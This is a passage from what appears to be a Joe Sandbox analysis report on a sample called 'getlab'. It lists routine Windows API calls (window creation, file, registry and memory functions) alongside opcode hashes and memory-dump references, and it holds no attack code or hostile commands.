                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CursorLoad
                                                                          • String ID:
                                                                          • API String ID: 3238433803-0
                                                                          • Opcode ID: 57390d314a1cb7161e6ddc30cf2ec12f57c29d9a020bc84e90da4252d8f033e1
                                                                          • Instruction ID: 59516fef74be350ba7f17c0e511b54e8d6c2303d910d3728eb6a55db14448276
                                                                          • Opcode Fuzzy Hash: 57390d314a1cb7161e6ddc30cf2ec12f57c29d9a020bc84e90da4252d8f033e1
                                                                          • Instruction Fuzzy Hash: 68F0271170421066D6109E3E6CC0A6B72A8DF82335B71037BFB3EC72D1CA2E1D414569
                                                                          APIs
                                                                          • SetErrorMode.KERNEL32(00008000), ref: 0042E396
                                                                          • LoadLibraryA.KERNEL32(00000000,00000000,0042E3E0,?,00000000,0042E3FE,?,00008000), ref: 0042E3C5
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLibraryLoadMode
                                                                          • String ID:
                                                                          • API String ID: 2987862817-0
                                                                          • Opcode ID: 5e1e313bdd13d7489a01f7e50f084508f9c5c97fde52d832d9963c9b8019f2bb
                                                                          • Instruction ID: aa33dc687cd71512c069df69893670fc4fcbad3b08ca7d4395289e8ee6212cdb
                                                                          • Opcode Fuzzy Hash: 5e1e313bdd13d7489a01f7e50f084508f9c5c97fde52d832d9963c9b8019f2bb
                                                                          • Instruction Fuzzy Hash: 13F08270714B44BFDB019F779CA282BBBECEB49B1179249B6FD00A3691E53C5910C928
                                                                          APIs
                                                                          • GetClassInfoA.USER32(00400000,?,?), ref: 004162D9
                                                                          • GetClassInfoA.USER32(00000000,?,?), ref: 004162E9
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: ClassInfo
                                                                          • String ID:
                                                                          • API String ID: 3534257612-0
                                                                          • Opcode ID: 0cefddb0d68ec1ee3d6e09aa9ac37d408dcb608ad702880eba3eeb66fdb88c2a
                                                                          • Instruction ID: 6cd5cb93a67b39dfae17eda9b7884797c0ece5161c54fd1178b0752c2523ee83
                                                                          • Opcode Fuzzy Hash: 0cefddb0d68ec1ee3d6e09aa9ac37d408dcb608ad702880eba3eeb66fdb88c2a
                                                                          • Instruction Fuzzy Hash: C7E01AB26015146EE710DFA89D81EE73BDCDB08350B2201B7FE08CB246D3A4DD008BA8
                                                                          APIs
                                                                          • SetFilePointer.KERNEL32(?,00000000,?,00000002,?,?,0046FF69,?,00000000), ref: 004508E2
                                                                          • GetLastError.KERNEL32(?,00000000,?,00000002,?,?,0046FF69,?,00000000), ref: 004508EA
                                                                            • Part of subcall function 00450688: GetLastError.KERNEL32(004504A4,0045074A,?,00000000,?,00497338,00000001,00000000,00000002,00000000,00497499,?,?,00000005,00000000,004974CD), ref: 0045068B
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$FilePointer
                                                                          • String ID:
                                                                          • API String ID: 1156039329-0
                                                                          • Opcode ID: b81912fe9410729738c8cc3b4427c31e6f6ea190abe7f97a6bc74282f8b5003d
                                                                          • Instruction ID: 7f4ce0808efc90522886b7fd4f7afe0cb5ca5dcd319eb65f5abb6fc959a7204b
                                                                          • Opcode Fuzzy Hash: b81912fe9410729738c8cc3b4427c31e6f6ea190abe7f97a6bc74282f8b5003d
                                                                          • Instruction Fuzzy Hash: BDE012A93542005FE700FA7589C1F2B22DCDB44315F00846AF945CA183D678CC054B69
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Global$AllocLock
                                                                          • String ID:
                                                                          • API String ID: 15508794-0
                                                                          • Opcode ID: 38fdb687bb69d238822be17628ba02d3430ff360103c12c92fad93c094244837
                                                                          • Instruction ID: 06179efae1cd4c7c45065c0f91b58358bdd8bb936cab03a6fa385f12497be06a
                                                                          • Opcode Fuzzy Hash: 38fdb687bb69d238822be17628ba02d3430ff360103c12c92fad93c094244837
                                                                          • Instruction Fuzzy Hash: 3E9002C4D10B00B8DC0072B20C1AD3F146CD8C172D3D0486F7004B61C3883C88004839
                                                                          APIs
                                                                          • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,004017ED), ref: 00401513
                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004017ED), ref: 0040153A
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Virtual$AllocFree
                                                                          • String ID:
                                                                          • API String ID: 2087232378-0
                                                                          • Opcode ID: 94577317c2bcd4d3a70d22c0b2f2fc78c72c60cff144ef5375d29febf27e2799
                                                                          • Instruction ID: 119661fe7174a079321c86e78af40791ac039b5eb8373b45468023a5ba433726
                                                                          • Opcode Fuzzy Hash: 94577317c2bcd4d3a70d22c0b2f2fc78c72c60cff144ef5375d29febf27e2799
                                                                          • Instruction Fuzzy Hash: F7F08272A0063067EB60596A4C81B5359859BC5B94F154076FD09FF3E9D6B58C0142A9
                                                                          APIs
                                                                          • GetSystemDefaultLCID.KERNEL32(00000000,00408702), ref: 004085EB
                                                                            • Part of subcall function 00406DDC: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00406DF9
                                                                            • Part of subcall function 00408558: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,00408623,?,00000000,00408702), ref: 00408576
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: DefaultInfoLoadLocaleStringSystem
                                                                          • String ID:
                                                                          • API String ID: 1658689577-0
                                                                          • Opcode ID: e0f2d7fee364d4b50c904546fee583fee48e6df64a24fbccf64ec24177fbbbf9
                                                                          • Instruction ID: bd6209dc85efa73f9a721b4ecfe58d49d0953a842630d38ee12c0cb785ae99e6
                                                                          • Opcode Fuzzy Hash: e0f2d7fee364d4b50c904546fee583fee48e6df64a24fbccf64ec24177fbbbf9
                                                                          • Instruction Fuzzy Hash: 1E314075E0011D9BCB01EF95C8819EEB779EF84314F518577E819BB386E738AE018B98
                                                                          APIs
                                                                          • SetScrollInfo.USER32(00000000,?,?,00000001), ref: 0041FC31
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: InfoScroll
                                                                          • String ID:
                                                                          • API String ID: 629608716-0
                                                                          • Opcode ID: cabb8c3e19a8a88e92d5d776e573f6eee413a8791bccb1521323fae2b782b601
                                                                          • Instruction ID: d0a12eb0c5d8f31e5c98d8a2781f1eb62c39d12b06d2a108fd5dac4500059ce8
                                                                          • Opcode Fuzzy Hash: cabb8c3e19a8a88e92d5d776e573f6eee413a8791bccb1521323fae2b782b601
                                                                          • Instruction Fuzzy Hash: C02130B16087466FC340DF39C5447A6BBE4BB88304F04893EA498C3741E778E996CBD6
                                                                          APIs
                                                                            • Part of subcall function 0041EE9C: GetCurrentThreadId.KERNEL32 ref: 0041EEEB
                                                                            • Part of subcall function 0041EE9C: 73A25940.USER32(00000000,0041EE4C,00000000,00000000,0041EF08,?,00000000,0041EF3F,?,0042EEA8,?,00000001), ref: 0041EEF1
                                                                          • SHPathPrepareForWriteA.SHELL32(00000000,00000000,00000000,00000000,00000000,0046C2CE,?,00000000,?,?,0046C4E0,?,00000000,0046C554), ref: 0046C2B2
                                                                            • Part of subcall function 0041EF50: IsWindow.USER32(?), ref: 0041EF5E
                                                                            • Part of subcall function 0041EF50: EnableWindow.USER32(?,00000001), ref: 0041EF6D
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Window$A25940CurrentEnablePathPrepareThreadWrite
                                                                          • String ID:
                                                                          • API String ID: 390483697-0
                                                                          • Opcode ID: 1950fa63623794e8b6cf7dfe712e88d918e2b7d9557fc3b7505cef75313acc34
                                                                          • Instruction ID: 435c92a82c98609a262d66890dafa743f24e5c1e823ccadb8e8beb41f7667319
                                                                          • Opcode Fuzzy Hash: 1950fa63623794e8b6cf7dfe712e88d918e2b7d9557fc3b7505cef75313acc34
                                                                          • Instruction Fuzzy Hash: 95F059B1288300BFE7049BF2ECA6B2577E9E318720F510477F904821C0E5B95800C51E
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: FileWrite
                                                                          • String ID:
                                                                          • API String ID: 3934441357-0
                                                                          • Opcode ID: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
                                                                          • Instruction ID: bbd698397dbc8f39e4f55c310c3945233451addb9156919cc96357002ab2f652
                                                                          • Opcode Fuzzy Hash: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
                                                                          • Instruction Fuzzy Hash: 66F06271614109DBBB1CCF58D1519AF7BA0EB44310B20406FF907C7BA0E6346E90DA58
                                                                          APIs
                                                                          • CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,00000000,00400000,?), ref: 0041657D
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CreateWindow
                                                                          • String ID:
                                                                          • API String ID: 716092398-0
                                                                          • Opcode ID: b152e844846ae8a52721441d180559fdf16f7956a15d86c9ff4cf0dcda8b9698
                                                                          • Instruction ID: 158b8484bb218b41c698b3aa21f26e2dd86497bc01e640ef524e7c8f4c0ee3c6
                                                                          • Opcode Fuzzy Hash: b152e844846ae8a52721441d180559fdf16f7956a15d86c9ff4cf0dcda8b9698
                                                                          • Instruction Fuzzy Hash: 4BF019B2200510AFDB84DE9CD9C0F9773ECEB0C210B0481A6FA08CB21AD220EC108BB0
                                                                          APIs
                                                                          • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004149E7
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CallbackDispatcherUser
                                                                          • String ID:
                                                                          • API String ID: 2492992576-0
                                                                          • Opcode ID: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
                                                                          • Instruction ID: 59ac3629b8f45f7a6bca1b57e2bf54285868c68ba6336e642f1ef9b7bb8d2b05
                                                                          • Opcode Fuzzy Hash: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
                                                                          • Instruction Fuzzy Hash: B2F0DA762042019FC740DF6CC8C488A77E5FF89255B5546A9F989CB356C731EC54CB91
                                                                          APIs
                                                                          • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004507D8
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CreateFile
                                                                          • String ID:
                                                                          • API String ID: 823142352-0
                                                                          • Opcode ID: fdd558c29566e738fcbdedabbf129a38e9c66ac316c6ebf650c30ee427f19e4e
                                                                          • Instruction ID: 52eb814c7c241dc182afdc6c3e242d4e4c9a4e6d94000e289351c80ae23ff87c
                                                                          • Opcode Fuzzy Hash: fdd558c29566e738fcbdedabbf129a38e9c66ac316c6ebf650c30ee427f19e4e
                                                                          • Instruction Fuzzy Hash: 53E012B53541483EE780EEAD6C42F9777DC971A714F008037B998D7341D461DD158BA8
                                                                          APIs
                                                                          • GetFileAttributesA.KERNEL32(00000000,00000000,0042CD0C,?,00000001,?,?,00000000,?,0042CD5E,00000000,004529F9,00000000,00452A1A,?,00000000), ref: 0042CCEF
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: AttributesFile
                                                                          • String ID:
                                                                          • API String ID: 3188754299-0
                                                                          • Opcode ID: 416bf2ec68b95bcc5af0582ff2491831708fe8216b24dbe794372527742e75b2
                                                                          • Instruction ID: 6c88cd9b3502ecc0d8ec22600fa2d9d68314b02b8b7bc0d4dcd5a0b3e687a907
                                                                          • Opcode Fuzzy Hash: 416bf2ec68b95bcc5af0582ff2491831708fe8216b24dbe794372527742e75b2
                                                                          • Instruction Fuzzy Hash: 62E0E570300304BFDB01EB62AC82A5EBFECDB45704BA14876B400A7242D5785E008418
                                                                          APIs
                                                                          • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00453247,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8DF
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: FormatMessage
                                                                          • String ID:
                                                                          • API String ID: 1306739567-0
                                                                          • Opcode ID: e6d3d52e8f4f63ecf0b34621506695ba35df63bdde710507be70f7165fd629ff
                                                                          • Instruction ID: 2ce6c9ff4e19e0960d9753b9113d8e2cc47385edbc752d5ed3014e636873cb34
                                                                          • Opcode Fuzzy Hash: e6d3d52e8f4f63ecf0b34621506695ba35df63bdde710507be70f7165fd629ff
                                                                          • Instruction Fuzzy Hash: 90E0D86178831116F23535566C43B77150E4380708F9840277B809E3D3D6AE9905A25E
                                                                          APIs
                                                                          • CreateWindowExA.USER32(00000000,00423674,00000000,94CA0000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C04), ref: 00406311
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CreateWindow
                                                                          • String ID:
                                                                          • API String ID: 716092398-0
                                                                          • Opcode ID: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
                                                                          • Instruction ID: 53e57476791a39574122dfc8a3f58f2f78c4a621b5a82e38d1c80b15216a1e52
                                                                          • Opcode Fuzzy Hash: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
                                                                          • Instruction Fuzzy Hash: EEE0FEB2214209BBDB00DE8ADCC1DABB7ACFB4C654F808105BB1C972428275AC608B71
                                                                          APIs
                                                                          • RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DE08
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Create
                                                                          • String ID:
                                                                          • API String ID: 2289755597-0
                                                                          • Opcode ID: a2fa4b3b70172a899a44371cb6cb166e106d6f14f5a748d009f698e06f133ef9
                                                                          • Instruction ID: bece317731ff8cd2e666e34543c7a68b5f38d577bb060a1f695f350ce1c31ea4
                                                                          • Opcode Fuzzy Hash: a2fa4b3b70172a899a44371cb6cb166e106d6f14f5a748d009f698e06f133ef9
                                                                          • Instruction Fuzzy Hash: 46E07EB2610129AFDB40DE8CDC81EEB37ADAB1D350F404016FA08D7200C274EC519BB4
                                                                          APIs
                                                                          • FindClose.KERNEL32(00000000,000000FF,0047078C,00000000,00471588,?,00000000,004715D1,?,00000000,0047170A,?,00000000,?,00000000), ref: 00454BE2
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CloseFind
                                                                          • String ID:
                                                                          • API String ID: 1863332320-0
                                                                          • Opcode ID: 06d429211cbdde73cb23459f0bbdb60b04e95dac6161286f70ab338dbad9895d
                                                                          • Instruction ID: 5b38ea55cb3c31d0920dcaeaf3b0ab9c64c5d1fc8265480bc1e0bc694521aac9
                                                                          • Opcode Fuzzy Hash: 06d429211cbdde73cb23459f0bbdb60b04e95dac6161286f70ab338dbad9895d
                                                                          • Instruction Fuzzy Hash: C3E092B0A056008BCB14DF3A898031A7AD29FC9324F04C56AEC9CCF3D7E63DC8594A27
                                                                          APIs
                                                                          • KiUserCallbackDispatcher.NTDLL(00494EF2,?,00494F14,?,?,00000000,00494EF2,?,?), ref: 00414693
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
Similarity
• API ID: CallbackDispatcherUser
• String ID:
• API String ID: 2492992576-0
APIs
• WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00406F14
Similarity
• API ID: FileWrite
• String ID:
• API String ID: 3934441357-0
APIs
  • Part of subcall function 004235F0: SystemParametersInfoA.USER32(00000048,00000000,00000000,00000000), ref: 00423605
